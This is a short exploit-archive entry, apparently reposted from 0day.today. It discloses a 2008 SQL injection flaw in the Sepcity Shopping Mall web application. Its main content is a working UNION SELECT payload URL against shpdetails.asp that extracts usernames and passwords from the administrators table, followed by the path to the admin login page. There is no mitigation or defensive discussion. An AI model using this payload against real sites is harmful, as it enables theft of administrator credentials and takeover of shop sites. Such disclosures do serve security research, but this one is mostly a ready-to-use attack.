id: 4563
date: 12/29/2008
title: Sepcity Shopping Mall (shpdetails.asp ID) SQL Injection Vulnerability
author: Osmanizim
cves: 

=====================================================================
Sepcity Shopping Mall (shpdetails.asp ID) SQL Injection Vulnerability
=====================================================================


#By Osmanizim 
#Security Specialist
#Title: Shopping Mall <=  SQL Injection Vulnerability.
#Demo : http://freeasp.sepcity.com/shopmall/default.asp



//  Exploit -->


http://localhost/shopmall/shpdetails.asp?ID=1 union select 0,1,2,username,password,5,6,7,8,9 from administrators




// Admin -->


http://localhost/shopmall/admlogin.asp?



#  0day.today [2023-03-21]  #